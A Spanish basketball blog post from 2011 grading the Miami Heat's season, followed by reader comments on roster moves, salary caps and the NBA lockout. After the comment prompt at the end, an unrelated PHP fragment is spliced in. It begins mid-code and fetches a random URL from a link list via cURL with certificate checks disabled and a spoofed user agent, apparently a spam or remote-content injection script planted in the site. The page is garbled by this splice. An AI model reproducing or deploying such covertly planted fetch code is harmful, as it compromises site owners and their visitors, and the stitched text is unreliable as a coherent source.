Miami Heat: Sobresaliente

14 de July de 2011 por TheDeerHunter

Es arriesgado decirlo pero, independientemente del epílogo, este año baloncestístico ha sido, casi de principio a fin, el año de los Miami Heat. La intención era nada menos que poner la liga patas arriba de un solo golpe y a punto han estado de conseguirlo. Jugada extremadamente ambiciosa, casi temeraria para bien y para mal. Para hacer una buena tortilla hace falta romper algunos huevos… Ese debe de ser el resumen de la filosofía Riley.

Un auténtico golpe de estado. No se puede negar que esta apuesta ha logrado captar la atención de todos de una forma sin precedentes. El precio por volver a la palestra de esta manera es haber generado una animadversión sin precedentes. No han nacido los “beach boys” sino “The sons of a beach”. El matiz es terrible. Además, desde el principio se ha enfocado este asunto de manera bipolar. Todo o nada, anillo o fracaso. Así es como parece han entendido la cuestión todos los actores, como también todo el entorno. Parte de eso queda y algunas heridas tardarán en cerrarse o quizás no lo hagan nunca.

Pero habría que dejar de lado tanto prejuicio que intoxica el juicio. Hay franquicias que no han alcanzado en toda su historia la mitad del esplendor de estos Heat en un sólo año. Sólo por eso debería haber merecido la pena todo. Tampoco está todo dicho al respecto.

Si el lockout lo permite veremos a este equipo de nuevo entre los candidatos el próximo curso. No necesitan cambiar mucho para lograrlo. Corrigiendo ciertos errores, madurando algunos conceptos o sosegando algunos ánimos este equipo será el rival a batir por todos.

Lo mejor: Tener a tres jugadores de la talla de LeBron, Wade y Bosh garantiza muchos triunfos, buen juego y resultados.

Lo peor: La animadversión generada, la actuación de LeBron en las finales y el rendimiento simultáneo de las tres super-estrellas.

Jugando a GM:

– Cuadrar una plantilla con 3 tíos cobrando 16 kilos cada uno es complicado. Asumimos que no existe intención de virar el proyecto a corto plazo. Deben ponerse a rezar desde ya mismo para que la cuestión del límite salarial no les afecte decisivamente.

– Ejercer la renovación a Chalmers. Haslem intransferible.

– Adios a Bibby, Dampier, Howard y Magloire. Mucho me temo que deberán seguir con la política de veteranos de reemplazo.

– Traspasar a Mike Miller, utilizando los expirings de Ilgauskas, House y Jones como reclamo.

Comenta

27 comentarios a esta entrada

  1. AndiD dice:
    #1

    Hay que reconocer que el impacto de Miami esta temporada ha sido brutal. Un sobresaliente para ellos, sin duda.
    Y lo más positivo es que a muchos se nos quedó una sensación de que fueron ellos quienes perdieron las finales. Eso tiene mucho mérito.
    Aprenderán para la temporada que viene? Sabrán generar un juego ofensivo fluido en un equipo que tiene tantas opciones? O seguirán con la defensa del pase y el contraataque como mejor arma?
    Jugar a GM con esos 3 contratazos no debe ser nada sencillo, pero seguro que el tío Riley se saca algún as de la manga. Un par de veteranos por el mínimo en busca de un anillo (quién dijo T-Mac?) y echar el resto por algún pívot decente.

    Eso sí, me volveré a alegrar si al final no consiguen el anillo 🙂

      Citar

  2. Rompe dice:
    #2

    Viendo el equipo que tenían este año, ves que no hace falta gran calidad en los jugadores de relleno para que vuelvan a ser los máximos favoritos al anillo. Y prácticamente te traigas a quien te traigas, mejoras lo presente… Este equipo sólo puede mejorar!

      Citar

  3. -=TheKing=- dice:
    #3

    La gente piensa que hacen un gran sacrificio por rebajarse el sueldo para poder jugar en el mismo equipo, pero es mentira, ganan más en contratos publicitarios estando en un equipo campeón que en uno que cae en playoff.

    Creo que es el futuro estilo de la nba jugadores jóvenes de gran calidad que se juntan en el mismo equipo para conseguir éxitos, perdonando dinero a la franquicia y ganandolo de contratos publicitarios.

      Citar

  4. Vader dice:
    #4

    Si pueden hacerse con Dalembert o algo parecido seran maximos favoritos.

    Saludos

      Citar

  5. Txusma dice:
    #5

    Pues vaya futuro le espera a la NBA… La diferencia entre los 8 equipos que luchen por el anillo y los 22 que no lo hagan será cada vez más grande. Evidentemente, estos equipos campeones se organizarán en franquicias con solera como Celtics, Lakers, Bulls, Heat, etc… No me veo a los Bobcats, Pacers, Wolves, etc… montando un super equipo con 3 agentes libres de super nivel.

      Citar

  6. -=TheKing=- dice:
    #6

    Al final la competitividad de la liga cae, pero no creo que llegue a ser como en España, con Barça y Baskonia como dos únicas opciones para llevarse la liga.

      Citar

  7. Nash dice:
    #7

    Ante todo buenas a todos, llevo tiempo leyendo la página pero no he comentado aun.
    No estoy de acuerdo con la nota. Un equipo con esos jugadores se ha de exigir ganar la NBA si o si, y han demostrado no poder con ello. Si bien su temporada ha sido buena, creo que un notable sería mucho mas ajustado a lo que realmente se debe esperar de un conjunto de estrellas asi

      Citar

  8. Esteban dice:
    #8

    solo puede mejorar? no creo q niguno de sus 3 estelares tengan mucho mas por hacer, han tocado techo, aunque reconozco que es muy alto, sobretodo el de lebron, lo q toca lo combierte en plata, por ahora le falta para el oro

    no tienen espacio, habra que ver si bibby juega por el minimo, no conseguiran jugadores de nivel semejante por 1 millon al año, ya que las exepciones y el espacio seran utilizados para un pivote

    el fracaso de mike miller se debio a su lesion, variosa equipos estarian dispuestos a contar con el, su contrato es bajo y puede producir, habra que ver q consiguen a cambio

    se fuie jones de bajisimo contrato, dificilmente alguien puede lanzar como el por ese dinero

    los pivotes veteranos fueron un fiasco, pero cobraban 1 millon cada uno, por ese valor quien produce mucho?

    es margen de maniobra es muy corto, demasiado para un equipo q necesita tapar varios huecos

    dos opciones:

    la primera y mas viable, renovar a chalmers por buen dinero, y aprovechar q aumenta su contrato para traspasarlo y asi salir del tope si esto es posible la prox temporada, si cobra unos 7 millones, podrian conseguir por el algun pivote algo veterano pero de mas vigencia, leale alguno de los internos de denver, portland que les sobran, o incluso Milicic
    con esto tendrian el puesto de pivote asegurado y la level medio iria para un base, el heat juega con lebron y wade armando desde las alas, asi q cualquiera base de salario promedio podria producir mucho, incluiso seguiria con bibby

    la otra opcion:

    aprovechar el parate y hacerse sumar kilos a Bosh para que pueda jugar de pivote, si quiee ser campeon deberia hacer ese sacrificio, altura tiene, un poco mas de sacrificio y kilos y podria ser el pivote de este equipo, con haslmen de titular como alapivote, tendrian un problema mas q resuelto

      Citar

  9. Denise dice:
    #9

    Equipo que en los próximos 5 años conseguirá como mínimo un anillo y un par de finales de conferencia.
    Buenisimo su proyecto a largo plazo,

      Citar

  10. safd dice:
    #10

    Los Heat este año con la mejora q tuvo Chalmers y con el fichaje de Dalemebert (esta cantado, si esq Miami es ademas casa de muchisimos haitianos, va a ser muy mediatico ademas) van a ser aun mejor equipo q el año pasado, sera un plantillon, no vale decir eso de q son solo 3 jugadores y solos no pueden (la excusa q se busca…).

    Con Chalmers-House(bibby tiene un nivel bastante malo, madre mia el lastre q nos quitamos xd) necesitarían otro base en este puesto. Quizás intentar un traspaso por algún combo-guard como Hinrich pero parece dificil. La opción más económica sera lentejita Boykins, q les saldría barato y complementaría esos 10-12mpp q les faltaría por cubrir. Chalmers tendria q explotar y jugar sus 30mpp, q si sigue al nivel q a veces mostro en PO se los merece.

    Los puestos de 2 y 3 con Mike Miller, James Jones (minimo) y las dos estrellitas, Wade-LeBron estarían más q cubiertos. Alomejor algun veterano mas.

    Y ya el de 4 y 5 con el cuarteto Haslem-Joel-Ilgauskas-Dalembert mas Bosh mas que cubierto, me gusta este juego interior.

    @Esteban no te preocupes, q si se tienen q cambiar las normas pa q LeBron gane alguna vez se hacen

    Nuevo convenio más justo ya! No puede ser q se junten las estrellitas de 3 en 3 con un lacito o q un equipo pueda tener 10 jugadores de alto nivel para la rotacion y luego otros equipos luchar todos los años por intentar sacar algo q les salve de un record negativo y a los q nadie quiere ir. Yo estoy a favor de lo del limite rigido de 62k, eso si, q se haga de manera progresiva, y q los 123k q se le prometieron a Joe Johnson se los tenemos q pagar. Lo q pasa q sera dificil hacer esta progresion, sobre todo porq los contratos son ascendentes la mayoria, pero se tienen q inventar algo, no se, q los equipo s q esten por debajo de 75k o asi q ya empiecen a tener limites estrictos pero con 75k y a los otros intentar algo mas light, porq tampoco puedes destrozar proyectos.

    PD: Not two, not three, not four, not five, not six, not seven… pues ocho va a ser q no tampoco, te vas a tener q conformar con uno si acaso, lo has dicho tu xd

      Citar

  11. Sempren dice:
    #11

    safd, es decir, que a los equipos que cumplen los penalizas con el limite rigido y a los que se pasan les das flexibilidad. Espero que los jefes de la NBA no piensen como tu jeje 😉

    Miami va a dar mucho que hablar. Yo apostaba por mejorar el equipo dejando ir a uno de los 3, pero viendo el rendimiento final del equipo y que habra mas jugadores dispuestos a “sacrificarse” a cobrar menos… deben seguir con esta via, con un poco mas de acierto con los Bibby de turno seran campeones.

      Citar

  12. safd dice:
    #12

    jajaja me exprese mal

    Esq a ver estoy a favor del limite de 62k, pero esq no se pueden desmontar proyectos. Entonces Dallas no puede renovar a Chandler? Miami echa a uno del big three? LA corta a Pau?

    Hay q buscar un metodo para entrar en el limite rigido, ya q con los contratos progresivos estos es imposible q no salgan equipos afectados gravemente. Esq a ver, con Kobe-Pau los Lakers si el limite es 62 rigidos pues llegaria un año q necesitarian 10 jugadores con 10k… un poco dificil no? xd

    Se tendria q buscar una forma progresiva para llegar a ese limite.

    Ya se q no sirvo como jefe de la NBA sempren xd

      Citar

  13. jas dice:
    #13

    Pues yo creo que intentar largar a bosh e intentar traerte a un center y un base aseados a cambio podria darle mas equilibrio al equipo.

      Citar

  14. AndiD dice:
    #14

    Vader, safd, de verdad veis tan claro lo de Dalembert y Miami?? Dalembert el año pasado cobró nada más y nada menos que 13.4 milloncejos.
    Con todo lo del lockout y el hard-limit bajará algo su salario, pero así y todo veo imposible que Miami pueda permitirse pagarle lo que otros equipos le ofrecerán.

      Citar

  15. Vader dice:
    #15

    Igual hay algun equipo que le puede ofrecer más pero tambien hay que tener en cuenta el atractivo deportivo y mediatico de los Heat. Ademas este último, el mediatico, se traduce en dolares…

      Citar

  16. safd dice:
    #16

    @jas no te puedes cargar un proyecto al año siguiente, pat seguira confiando en el big three

    @Andi esq con lo del hard limit esq miami con su big three llegaria un año q lo pasa creo, vamos, q esq estarian obligados a cortar a alguno o largarlo.

    Yo lo de Dalembert lo veo clarisimo. Si esq va a estar en el mejor proyecto y va a ser de los jugadores mas mediaticos de florida (hay una comunidad haitiana bastante grande en Miami). No encuentro datos de % de haitianos en Miami pero en la wiki pone q el criollo haitiano (este idioma es de mas paises q de haiti, pero sobre todo haiti) es el primer idioma del 5% de los habitantes. Por lo q lei en la wiki tb habia programas en miami en criollo haitiano. No creo q haya comunidades haitianas mas grandes en eeuu.

    Pues eso, q va a ser supermediatico y va a estar como en casa. Mid-level.

      Citar

  17. Txusma dice:
    #17

    Un jugador como Dalembert seguro que se conforma con una Mid Level en Miami.

    Y si se pone el límite duro habrá unos años de adaptación. No me he leído muy bien la propuesta pero evidentemente no se hace de un año para otro.

      Citar

  18. TheDeerHunter dice:
    #18

    Últimamente habláis como si renunciar a 4 o 5 millones de dólares fuera algo trivial e incluso habitual y más para un jugador como Dalembert. Si alguien le ofrece 10-12 kilos (que no debería extrañar visto lo visto) ¿en qué cabeza cabe que se conformaría con una mid-level? Recordemos lo que son: profesionales.

    Por otro lado supongo que habrá periodo de adaptación para el límite duro.. pero es que Miami tiene comprometidos una media de 60 kilos en 3 tíos hasta la 2016. Me parece muy extraño que pongan una regla como esa a 5-6 años vista, después de que se hayan olvidado de la crisis y todo.

      Citar

  19. safd dice:
    #19

    Por lo

      Citar

  20. safd dice:
    #20

    Por lo q hoy te daban opcion a renunciar a un contrato.

    Pero vamos q eso no es justo ni vas a ningun lao si echas a alguno de tus mejores jugadores

      Citar

  21. safd dice:
    #21

    dios, hoy no, oi perdon, q duele a la vista

      Citar

  22. Txusma dice:
    #22

    Todo depende del equipo por el que firme. Si Dalembert firma por la Mid Level en Miami tiene claras oportunidades de anillo y si firma 10 kilos por cualquier equipo que pueda ofrecérselo lo más probable es que veo el anillo de lejos.
    Si Lebron y Bosh han renunciado a parte de su salario, como no va a hacerlo un tío como Samuel?

      Citar

  23. Esteban dice:
    #23

    dudo q dalmebert firme por el medio, ojo si eso pasa habra q estudiar bien si no gana dinero por fuera, hay varios equipos dispuestos a darle casi 10 mill este año a un pivote

      Citar

  24. Vader dice:
    #24

    7 millones podria ser… pero darle 10 millones con contrato largo a Dalembert?? Me extrañaria la verdad.

      Citar

  25. Sempren dice:
    #25

    Por cierto… ¿cómo van las negociaciones para levantar el lock out?

      Citar

  26. HisRoyalAirness dice:
    #26

    Yo creo que una locura impopular como tradear a Lebron por Howard significaría 2 anillos seguidos, por lo menos.

      Citar

  27. Blade Petrovic dice:
    #27

    Para mí lo peor de los heat son las finales de lebron

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>